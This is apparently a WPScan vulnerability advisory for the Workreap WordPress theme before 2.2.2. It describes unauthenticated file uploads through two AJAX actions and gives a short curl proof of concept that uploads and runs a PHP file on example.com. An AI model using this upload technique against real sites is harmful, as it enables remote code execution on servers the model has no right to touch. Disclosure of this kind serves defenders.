Lucene search

K
wpvulndbHarald Eilertsen (Jetpack)WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB
HistoryJul 02, 2021 - 12:00 a.m.

Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution

2021-07-0200:00:00
Harald Eilertsen (Jetpack)
wpscan.com
9

The theme’s AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.

PoC

% curl -F ‘action=workreap_award_temp_file_uploader’ -F [email protected]http://example.com/wp-admin/admin-ajax.php’ {“type”:“success”,“message”:“File uploaded!”,“thumbnail”:“http://example.com/wp-content/uploads/workreap-temp/malicious.php”,“name”:“malicious.php”,“size”:“24.00 B”} % curl ‘http://example.com/wp-content/uploads/workreap-temp/malicious.php’ PWNED!

CPENameOperatorVersion
workreaplt2.2.2